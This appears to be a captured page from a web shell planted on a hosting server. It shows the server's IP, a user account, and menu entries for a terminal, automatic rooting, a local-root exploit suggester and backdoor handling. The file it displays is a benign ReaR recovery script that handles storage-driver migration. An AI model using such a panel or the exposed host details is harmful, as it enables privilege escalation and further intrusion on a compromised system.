Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.158
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
verify /
GNU /
Linux /
Delete
Unzip
Name
Size
Permission
Date
Action
230_storage_and_network_modules.sh
1.7
KB
-rw-r--r--
2026-04-01 09:39
260_recovery_storage_drivers.sh
1.5
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
# Find the storage drivers for the recovery hardware. # Skip if not recover WORKFLOW: test "recover" = "$WORKFLOW" || return 0 # A longer time ago udev was optional on some distros. # This changed and nowadays udev is not optional any more. # See https://github.com/rear/rear/pull/1171#issuecomment-274442700 # But it is not necessarily an error if the storage drivers # for the recovery hardware cannot be determined: if ! have_udev ; then LogPrint "Cannot determine storage drivers (no udev found), proceeding bona fide" return 0 fi FindStorageDrivers $TMP_DIR/dev >$TMP_DIR/storage_drivers if ! test -s $TMP_DIR/storage_drivers ; then Log "No driver migration: No needed storage drivers found ('$TMP_DIR/storage_drivers' is empty)" return 0 fi # During "rear mkbackup/mkrescue" 260_storage_drivers.sh creates $VAR_DIR/recovery/storage_drivers if cmp -s $TMP_DIR/storage_drivers $VAR_DIR/recovery/storage_drivers ; then Log "No driver migration: '$TMP_DIR/storage_drivers' and '$VAR_DIR/recovery/storage_drivers' are the same" return 0 fi if is_false $REBUILD_INITRAMFS ; then LogPrint "WARNING: Changed storage drivers require recreating initramfs/initrd but it will not be recreated (REBUILD_INITRAMFS='$REBUILD_INITRAMFS'). It might work with the initrd 'as is' from the backup restore. Before reboot check the recreated system (mounted at $TARGET_FS_ROOT) and decide yourself, if your recreated system will boot or not. " else LogPrint "Will do driver migration (recreating initramfs/initrd)" fi